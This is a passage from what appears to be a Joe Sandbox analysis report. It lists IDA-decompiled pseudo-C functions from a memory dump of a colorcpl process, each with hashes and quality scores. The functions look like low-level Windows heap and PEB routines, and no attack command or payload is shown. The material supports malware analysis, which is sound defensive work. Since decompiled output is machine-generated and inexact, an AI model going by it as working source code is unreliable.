                                                                                                							if(_t38 != 0) {
                                                                                                								if(_t21 != 0) {
                                                                                                									E06E97016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                                                									L06E32400( &_v52);
                                                                                                								}
                                                                                                								_t21 = L06E32400( &_v28);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t21;
                                                                                                			}




















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 278b044cbdf58374b69371eb1e261553f5eadcd98b35a7d86e72b61c7b2e75e9
                                                                                                • Instruction ID: d00c8f8a338009ae787e3ef3e25bb71f5f69a15f7dc7bace31cc10b70c14ec97
                                                                                                • Opcode Fuzzy Hash: 278b044cbdf58374b69371eb1e261553f5eadcd98b35a7d86e72b61c7b2e75e9
                                                                                                • Instruction Fuzzy Hash: 4521D3729003449FEB91EF28C944B6BB7ECAF81684F051456F96087350E734C909CAF2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E06EE070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v11;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v15;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v28;
                                                                                                				void* __ebx;
                                                                                                				char* _t32;
                                                                                                				signed int* _t38;
                                                                                                				signed int _t60;
                                                                                                
                                                                                                				_t38 = __ecx;
                                                                                                				_v16 = __edx;
                                                                                                				_t60 = E06EE07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                                                				if(_t60 != 0) {
                                                                                                					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                                                					_push( *_t7);
                                                                                                					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                                                					_push( *_t9);
                                                                                                					_v12 = _a8 << 0xc;
                                                                                                					_t11 = _t38 + 4; // 0x5de58b5b
                                                                                                					_push(0x4000);
                                                                                                					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                                                					E06EDAFDE( &_v8,  &_v12);
                                                                                                					E06EE1293(_t38, _v28, _t60);
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t32 = 0x7ffe0380;
                                                                                                					} else {
                                                                                                						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                					}
                                                                                                					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                                                						E06ED14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                                                					}
                                                                                                				}
                                                                                                				return  ~_t60;
                                                                                                			}














                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                • Instruction ID: aefd950653589036cd91572b7ed394eeedeaa50ef40a506de68c0380111107f5
                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                • Instruction Fuzzy Hash: 482146366043009FD745EF18CC80BAABBA9EFD5310F048569F9948B381DB70D919CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 96%
                                                                                                			E06E3AE73(intOrPtr __ecx, void* __edx) {
                                                                                                				intOrPtr _v8;
                                                                                                				void* _t19;
                                                                                                				char* _t22;
                                                                                                				signed char* _t24;
                                                                                                				intOrPtr _t25;
                                                                                                				intOrPtr _t27;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t36;
                                                                                                				char* _t38;
                                                                                                				signed char* _t42;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t31 = __edx;
                                                                                                				_v8 = __ecx;
                                                                                                				_t19 = E06E37D50();
                                                                                                				_t38 = 0x7ffe0384;
                                                                                                				if(_t19 != 0) {
                                                                                                					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                				} else {
                                                                                                					_t22 = 0x7ffe0384;
                                                                                                				}
                                                                                                				_t42 = 0x7ffe0385;
                                                                                                				if( *_t22 != 0) {
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t24 = 0x7ffe0385;
                                                                                                					} else {
                                                                                                						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                					}
                                                                                                					if(( *_t24 & 0x00000010) != 0) {
                                                                                                						goto L17;
                                                                                                					} else {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L3:
                                                                                                					_t27 = E06E37D50();
                                                                                                					if(_t27 != 0) {
                                                                                                						_t27 =  *[fs:0x30];
                                                                                                						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                                                                					}
                                                                                                					if( *_t38 != 0) {
                                                                                                						_t27 =  *[fs:0x30];
                                                                                                						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                                                                							goto L5;
                                                                                                						}
                                                                                                						_t27 = E06E37D50();
                                                                                                						if(_t27 != 0) {
                                                                                                							_t27 =  *[fs:0x30];
                                                                                                							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                                                                						}
                                                                                                						if(( *_t42 & 0x00000020) != 0) {
                                                                                                							L17:
                                                                                                							_t25 = _v8;
                                                                                                							_t36 = 0;
                                                                                                							if(_t25 != 0) {
                                                                                                								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                                                                							}
                                                                                                							_t27 = E06E97794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                                                                						}
                                                                                                						goto L5;
                                                                                                					} else {
                                                                                                						L5:
                                                                                                						return _t27;
                                                                                                					}
                                                                                                				}
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                • Instruction ID: 38f08b531a99a47c6d14b7d5c6c1ba2b126b364f890f8013be8c6aaba937d036
                                                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                • Instruction Fuzzy Hash: 51210471A257948FEBA2AB29C948B2537E8EF00354F0910A1DE0C8B292D735DD80C7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E06E97794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _t21;
                                                                                                				void* _t24;
                                                                                                				intOrPtr _t25;
                                                                                                				void* _t36;
                                                                                                				short _t39;
                                                                                                				signed char* _t42;
                                                                                                				unsigned int _t46;
                                                                                                				void* _t50;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t21 =  *0x6f07b9c; // 0x0
                                                                                                				_t46 = _a8;
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __ecx;
                                                                                                				_t4 = _t46 + 0x2e; // 0x2e
                                                                                                				_t36 = _t4;
                                                                                                				_t24 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                                                				_t50 = _t24;
                                                                                                				if(_t50 != 0) {
                                                                                                					_t25 = _a4;
                                                                                                					if(_t25 == 5) {
                                                                                                						L3:
                                                                                                						_t39 = 0x14b1;
                                                                                                					} else {
                                                                                                						_t39 = 0x14b0;
                                                                                                						if(_t25 == 6) {
                                                                                                							goto L3;
                                                                                                						}
                                                                                                					}
                                                                                                					 *((short*)(_t50 + 6)) = _t39;
                                                                                                					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                                                					_t11 = _t50 + 0x2c; // 0x2c
                                                                                                					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                                                					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                                                					E06E5F3E0(_t11, _a12, _t46);
                                                                                                					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t42 = 0x7ffe0384;
                                                                                                					} else {
                                                                                                						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                					}
                                                                                                					_push(_t50);
                                                                                                					_t19 = _t36 - 0x20; // 0xe
                                                                                                					_push(0x403);
                                                                                                					_push( *_t42 & 0x000000ff);
                                                                                                					E06E59AE0();
                                                                                                					_t24 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                                                				}
                                                                                                				return _t24;
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d43ce82633dab9a6c2fdc72e9fa96061a60cd4bc519664e46eceed4084d6b72d
                                                                                                • Instruction ID: 6fea93e7cca3e187b4a20f20e533b3f65a9d97b4447a9994e5965124e2dd6c0c
                                                                                                • Opcode Fuzzy Hash: d43ce82633dab9a6c2fdc72e9fa96061a60cd4bc519664e46eceed4084d6b72d
                                                                                                • Instruction Fuzzy Hash: EE21CF72910714ABCB65DF69DC84EABB7ACEF48340F100169E90AC7690D634E900CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E06E4FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                				intOrPtr _v8;
                                                                                                				void* _t19;
                                                                                                				intOrPtr _t29;
                                                                                                				intOrPtr _t32;
                                                                                                				intOrPtr _t35;
                                                                                                				intOrPtr _t37;
                                                                                                				intOrPtr* _t40;
                                                                                                
                                                                                                				_t35 = __edx;
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t37 = 0;
                                                                                                				_v8 = __edx;
                                                                                                				_t29 = __ecx;
                                                                                                				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                                                					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                                                					L3:
                                                                                                					_t19 = _a4 - 4;
                                                                                                					if(_t19 != 0) {
                                                                                                						if(_t19 != 1) {
                                                                                                							L7:
                                                                                                							return _t37;
                                                                                                						}
                                                                                                						if(_t35 == 0) {
                                                                                                							L11:
                                                                                                							_t37 = 0xc000000d;
                                                                                                							goto L7;
                                                                                                						}
                                                                                                						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                                                							_t35 = _v8;
                                                                                                						}
                                                                                                						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					if(_t29 == 0) {
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					_t32 =  *_t40;
                                                                                                					if(_t32 != 0) {
                                                                                                						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                                                						E06E276E2( *_t40);
                                                                                                					}
                                                                                                					 *_t40 = _t29;
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				_t40 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                                                				if(_t40 == 0) {
                                                                                                					_t37 = 0xc0000017;
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				_t35 = _v8;
                                                                                                				 *_t40 = 0;
                                                                                                				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                                                				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                                                				goto L3;
                                                                                                			}











                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                • Instruction ID: 63f5ae9b6a20de28c488d63163b051f3a30d10c39c21c1327b76919bce5ade12
                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                • Instruction Fuzzy Hash: 1E217972A00B44DFD7B1EF19E680E66B7E5EBD4E15F25916EE94987A10D730AC00CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E06E19240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr _t37;
                                                                                                				intOrPtr _t41;
                                                                                                				intOrPtr* _t46;
                                                                                                				void* _t48;
                                                                                                				intOrPtr _t50;
                                                                                                				intOrPtr* _t60;
                                                                                                				void* _t61;
                                                                                                				intOrPtr _t62;
                                                                                                				intOrPtr _t65;
                                                                                                				void* _t66;
                                                                                                				void* _t68;
                                                                                                
                                                                                                				_push(0xc);
                                                                                                				_push(0x6eef708);
                                                                                                				E06E6D08C(__ebx, __edi, __esi);
                                                                                                				_t65 = __ecx;
                                                                                                				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                                				if( *(__ecx + 0x24) != 0) {
                                                                                                					_push( *(__ecx + 0x24));
                                                                                                					E06E595D0();
                                                                                                					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                                				}
                                                                                                				L6();
                                                                                                				L6();
                                                                                                				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                                				E06E595D0();
                                                                                                				_t33 =  *0x6f084c4; // 0x0
                                                                                                				L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                                				_t37 =  *0x6f084c4; // 0x0
                                                                                                				L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                                				_t41 =  *0x6f084c4; // 0x0
                                                                                                				E06E32280(L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x6f086b4);
                                                                                                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                                				_t46 = _t65 + 0xe8;
                                                                                                				_t62 =  *_t46;
                                                                                                				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                                				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                                					_t61 = 3;
                                                                                                					asm("int 0x29");
                                                                                                					_push(_t65);
                                                                                                					_t66 = _t61;
                                                                                                					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                                					_push( *_t23);
                                                                                                					E06E595D0();
                                                                                                					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                                					_push( *_t24);
                                                                                                					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                                					_t48 = E06E595D0();
                                                                                                					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                                					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                                					return _t48;
                                                                                                				} else {
                                                                                                					 *_t60 = _t62;
                                                                                                					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                                					 *(_t68 - 4) = 0xfffffffe;
                                                                                                					E06E19325();
                                                                                                					_t50 =  *0x6f084c4; // 0x0
                                                                                                					return E06E6D0D1(L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                                				}
                                                                                                			}
















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 317e69c61368d5e8e8eef5b07c1761ac07ce9e293ebfca5c9d2d7b4f8e855600
                                                                                                • Instruction ID: c74a92dfaa3fb6ca56f6cb8c7fb6d5204e41e35ca5ecad0a83b45a3d13ad53db
                                                                                                • Opcode Fuzzy Hash: 317e69c61368d5e8e8eef5b07c1761ac07ce9e293ebfca5c9d2d7b4f8e855600
                                                                                                • Instruction Fuzzy Hash: EF213671150700EFCBE1EF28CE14B59B7BDFF08704F455568A1698B6A2CB34EA51DB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 54%
                                                                                                			E06E4B390(void* __ecx, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				signed char _t12;
                                                                                                				signed int _t16;
                                                                                                				signed int _t21;
                                                                                                				void* _t28;
                                                                                                				signed int _t30;
                                                                                                				signed int _t36;
                                                                                                				signed int _t41;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t41 = _a4 + 0xffffffb8;
                                                                                                				E06E32280(_t12, 0x6f08608);
                                                                                                				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                                                				asm("sbb edi, edi");
                                                                                                				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                                                				_v8 = _t36;
                                                                                                				asm("lock cmpxchg [ebx], ecx");
                                                                                                				_t30 = 1;
                                                                                                				if(1 != 1) {
                                                                                                					while(1) {
                                                                                                						_t21 = _t30 & 0x00000006;
                                                                                                						_t16 = _t30;
                                                                                                						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                                                						asm("lock cmpxchg [edi], esi");
                                                                                                						if(_t16 == _t30) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t30 = _t16;
                                                                                                					}
                                                                                                					_t36 = _v8;
                                                                                                					if(_t21 == 2) {
                                                                                                						_t16 = E06E500C2(0x6f08608, 0, _t28);
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t36 != 0) {
                                                                                                					_t16 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                                                				}
                                                                                                				return _t16;
                                                                                                			}












                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b929f40a6eab7dce4896789238604589b21db5c9764ee54a0ab0a973510de9c
                                                                                                • Instruction ID: ff1c4b2d825b23d0ed471f738a32f968774b5ea5cb53b7e86c38b8f0bdcb6ef5
                                                                                                • Opcode Fuzzy Hash: 0b929f40a6eab7dce4896789238604589b21db5c9764ee54a0ab0a973510de9c
                                                                                                • Instruction Fuzzy Hash: A7116F337213105FCF98AA659D4566B735AEBC5770B252139ED2BC73C0D9719C02C6D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E06EA4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr* _t27;
                                                                                                				intOrPtr* _t30;
                                                                                                				intOrPtr* _t31;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr* _t34;
                                                                                                				intOrPtr* _t35;
                                                                                                				void* _t37;
                                                                                                				void* _t38;
                                                                                                				void* _t39;
                                                                                                				void* _t43;
                                                                                                
                                                                                                				_t39 = __eflags;
                                                                                                				_t35 = __edi;
                                                                                                				_push(8);
                                                                                                				_push(0x6ef08d0);
                                                                                                				E06E6D08C(__ebx, __edi, __esi);
                                                                                                				_t37 = __ecx;
                                                                                                				E06EA41E8(__ebx, __edi, __ecx, _t39);
                                                                                                				E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                                				_t18 = _t37 + 8;
                                                                                                				_t33 =  *_t18;
                                                                                                				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                                                				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                                                					L8:
                                                                                                					_push(3);
                                                                                                					asm("int 0x29");
                                                                                                				} else {
                                                                                                					 *_t27 = _t33;
                                                                                                					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                                                					_t35 = 0x6f087e4;
                                                                                                					_t18 =  *0x6f087e0; // 0x0
                                                                                                					while(_t18 != 0) {
                                                                                                						_t43 = _t18 -  *0x6f05cd0; // 0xffffffff
                                                                                                						if(_t43 >= 0) {
                                                                                                							_t31 =  *0x6f087e4; // 0x0
                                                                                                							_t18 =  *_t31;
                                                                                                							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                                                								goto L8;
                                                                                                							} else {
                                                                                                								 *0x6f087e4 = _t18;
                                                                                                								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                                                								L06E17055(_t31 + 0xfffffff8);
                                                                                                								_t24 =  *0x6f087e0; // 0x0
                                                                                                								_t18 = _t24 - 1;
                                                                                                								 *0x6f087e0 = _t18;
                                                                                                								continue;
                                                                                                							}
                                                                                                						}
                                                                                                						goto L9;
                                                                                                					}
                                                                                                				}
                                                                                                				L9:
                                                                                                				__eflags =  *0x6f05cd0;
                                                                                                				if( *0x6f05cd0 <= 0) {
                                                                                                					L06E17055(_t37);
                                                                                                				} else {
                                                                                                					_t30 = _t37 + 8;
                                                                                                					_t34 =  *0x6f087e8; // 0x0
                                                                                                					__eflags =  *_t34 - _t35;
                                                                                                					if( *_t34 != _t35) {
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						 *_t30 = _t35;
                                                                                                						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                                                						 *_t34 = _t30;
                                                                                                						 *0x6f087e8 = _t30;
                                                                                                						 *0x6f087e0 = _t18 + 1;
                                                                                                					}
                                                                                                				}
                                                                                                				 *(_t38 - 4) = 0xfffffffe;
                                                                                                				return E06E6D0D1(L06EA4320());
                                                                                                			}
















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cc87fa39b93035b28695453eb68324fc2ac0892019158aad464743d373a696d6
                                                                                                • Instruction ID: 96fa92fde2f357dca1de732953d8c8d84d4c913dd7c2a29582ce74ef559cf738
                                                                                                • Opcode Fuzzy Hash: cc87fa39b93035b28695453eb68324fc2ac0892019158aad464743d373a696d6
                                                                                                • Instruction Fuzzy Hash: FA218B70A10704CFDBD5EF24D40061477E2FF89398B20A26AC225CF294E7B5A445CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E06E946A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                                                				signed short* _v8;
                                                                                                				unsigned int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				signed int _t22;
                                                                                                				signed char _t23;
                                                                                                				short _t32;
                                                                                                				void* _t38;
                                                                                                				char* _t40;
                                                                                                
                                                                                                				_v12 = __edx;
                                                                                                				_t29 = 0;
                                                                                                				_v8 = __ecx;
                                                                                                				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                                                				_t38 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                                                				if(_t38 != 0) {
                                                                                                					_t40 = _a4;
                                                                                                					 *_t40 = 1;
                                                                                                					E06E5F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                					_t22 = _v12 >> 1;
                                                                                                					_t32 = 0x2e;
                                                                                                					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                                                					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                                                					_t23 = E06E4D268(_t38, 1);
                                                                                                					asm("sbb al, al");
                                                                                                					 *_t40 =  ~_t23 + 1;
                                                                                                					L06E377F0(_v16, 0, _t38);
                                                                                                				} else {
                                                                                                					 *_a4 = 0;
                                                                                                					_t29 = 0xc0000017;
                                                                                                				}
                                                                                                				return _t29;
                                                                                                			}












                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                • Instruction ID: 8a6b0ee669ff422bb23f55a898ba51ddcb4089901a9d9a077858cd4295b3b13c
                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                • Instruction Fuzzy Hash: 4411C272904208BBCB059F6C98808BEB7BDEF95304F1090AAF944C7391DA318D55D7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 34%
